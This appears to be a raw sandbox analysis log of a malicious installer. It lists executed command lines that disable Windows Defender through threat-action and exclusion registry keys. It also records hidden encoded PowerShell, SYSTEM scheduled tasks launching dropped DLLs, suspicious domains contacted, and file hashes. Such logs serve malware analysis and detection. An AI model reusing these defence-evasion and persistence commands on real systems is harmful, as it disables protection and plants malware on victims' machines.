"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hkBthRLftwjEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oGdIbQIKIHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prAQyJMeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zNBDoCPwUgCU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wpmocubwzvTKZWVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HKomOEKiubDeyUja\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wpmocubwzvTKZWVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HKomOEKiubDeyUja /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gJJxEqrOx" /SC once /ST 15:50:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gJJxEqrOx"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gJJxEqrOx"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 02:07:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe\" 4u /JYLYdidbj 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "emrEEeoVdUigmulhl"

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe

C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\YXLifdQ.exe 4u /JYLYdidbj 525403 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 776

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\JLdZDm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rbzCIowvsKWRrhO2" /F /xml "C:\Program Files (x86)\prAQyJMeU\FiwGDIq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "rbzCIowvsKWRrhO"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yZMZGSbxnbvyuO" /F /xml "C:\Program Files (x86)\zNBDoCPwUgCU2\OghXjcG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IeZcDvoJstcUS2" /F /xml "C:\ProgramData\wpmocubwzvTKZWVB\HPnFzwq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "XgRdArvYBmOriRaMM2" /F /xml "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\eeAXify.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "pKGBoMxbXyYHoUCPnwv2" /F /xml "C:\Program Files (x86)\hkBthRLftwjEC\lGlUDQP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EXxaHtUqjXkXqVrbU" /SC once /ST 13:40:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HKomOEKiubDeyUja\oFVSDuqo\FCOViLB.dll\",#1 /dxdidcK 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "EXxaHtUqjXkXqVrbU"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\oFVSDuqo\FCOViLB.dll",#1 /dxdidcK 525403

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\HKomOEKiubDeyUja\oFVSDuqo\FCOViLB.dll",#1 /dxdidcK 525403

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "emrEEeoVdUigmulhl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 2196

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "EXxaHtUqjXkXqVrbU"

Network

Country Destination Domain Proto
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 32.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 50.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 api2.check-data.xyz udp
US 44.237.26.169:80 api2.check-data.xyz tcp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 169.253.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe

MD5 4a90eddd33f120d1679ca04cf6a48891
SHA1 224f27d804bfc0a5d0948d0a928f0f92a1bbd7c8
SHA256 83f247c358d03498e9eea1783f89d3290cd686c9511bec56e906d9d0cc3740ca
SHA512 869b95497f751e097d5d75397677db7cd1b1795b15704084f4387154eebd19f68b23e8b6dd6e122ef57eecec33b2ce73547c3d243953eef7b3aacb39d9f7d187

C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe

MD5 f9a08c6959d27b9edcb157f1938ff8c9
SHA1 f57fc4c0780afc65f84b3f1fddd55bdd7519c3e2
SHA256 d052b74c87dd082fa1ccc32b8441e63e433a60c69b21174ccf43f7f134a725e0
SHA512 eabdfc83451aa2523b924f670a5026438dc69ae9c0687b8bf12c9e318e0bbab34862ebc7e39221f140af67cd9622e5e4f9c7881feb7376bb9c4fd31e3b62fe33

memory/4496-14-0x0000000004B80000-0x0000000004BB6000-memory.dmp

memory/4496-15-0x0000000007610000-0x0000000007C38000-memory.dmp

memory/4496-16-0x00000000075D0000-0x00000000075F2000-memory.dmp

memory/4496-17-0x0000000007E90000-0x0000000007EF6000-memory.dmp

memory/4496-18-0x0000000007F00000-0x0000000007F66000-memory.dmp

memory/4496-19-0x0000000007F70000-0x00000000082C0000-memory.dmp

memory/4496-20-0x0000000007E40000-0x0000000007E5C000-memory.dmp

memory/4496-21-0x0000000008630000-0x000000000867B000-memory.dmp

memory/4496-22-0x0000000008700000-0x0000000008776000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5uqnjhze.hpr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4496-37-0x0000000009730000-0x00000000097C4000-memory.dmp

memory/4496-38-0x00000000094A0000-0x00000000094BA000-memory.dmp

memory/4496-39-0x00000000094F0000-0x0000000009512000-memory.dmp

memory/4496-40-0x0000000009CD0000-0x000000000A1CE000-memory.dmp

memory/4924-48-0x0000000010000000-0x00000000105E8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1 eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256 dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512 977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

memory/1288-54-0x0000000007980000-0x0000000007CD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fc1f786c9b5b427ae98d5b50b8ea7ff3
SHA1 727aa57b3c0658bdd4bd714c74c5b074783a6fde
SHA256 eb218a124fbf4c70d0611cd3c908f3549eab39373bc2332bdf92fdfa50c786eb
SHA512 68b8ba233e614680f1d386c869835a05cac013cb80e15b4c5f4112ddee90e9e7e3597eb5239a86afdb78945e305b4128eb5b62617f20c7914eb5ed4de0523380

memory/1288-56-0x0000000007F80000-0x0000000007FCB000-memory.dmp

memory/4468-95-0x0000000010000000-0x00000000105E8000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 c558fdaa3884f969f1ec904ae7bbd991
SHA1 b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA256 3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA512 6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b7ff748a4b172cafa20b254a66b4ab40
SHA1 4676c8d6cbd3190479f19921374aa73ba84690c4
SHA256 033d177f4eb92fbf2921c6bcf18f4ae6a237043ab9650867a097d5beb2b95c21
SHA512 8f08a27df852831fc3a4fa4e63b223eaa68086c31276de37aa539b7504392914453b52980f6bff48bb65914ff9c2ac79902beafb98df1f08ddea9843fa65df56

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2312611eeb1c5b573aa54f3bba1ab3e9
SHA1 cecc0cb13e84299ee0c37407da53d19db35235fb
SHA256 3cd964584df7a5b1aa053852857b1f0341cdd7ac1d78c3e2ffa421c775048be8
SHA512 3c3571a7327befe166b2ca8ff48b1aca1878430d0ec27b849c48004b2aa741c8c36832520ae5988c620913f0657f298d93eb6a730317ba4c858a0bdb6e32dddd

memory/2648-134-0x000001B2C3470000-0x000001B2C3492000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fdec4477641c8d86b26a0192d44b0364
SHA1 1697052f749b911327a1a5a2512a03138a02ab3b
SHA256 fba11ddbb289f062055a43eeac327b4a1a3aa85cc575d4dec2d5bbd59fd5ac16
SHA512 772346fe8557d24f0c251b3cadd1feac32befc7f715f8cf4329eb94f020f83e6557b331b5401b132f707fd0c1aae4007c8207a954391fb8e12c7324bac49fc9f

memory/2648-138-0x000001B2C3620000-0x000001B2C3696000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ad9f64e5d47c96d05165f80153daff7d
SHA1 59dbaeaad4f8b41139942f12412fcdbc04a4889b
SHA256 f9a1b750002aedca144ac7aab434ee88c522d15a7268862e847bf955489c009f
SHA512 7205d2cf7282a3030176b00ecca6a41d58ea409ded317e98aee594cb3773886147fcad519f65099a561e98bbe915384e40f8070023f9eb6bd8aca542379a3ae8

memory/4616-190-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/4616-203-0x00000000026D0000-0x0000000002755000-memory.dmp

memory/664-211-0x0000000006870000-0x0000000006BC0000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 69511b794c060945e0ed03a9aa798e4e
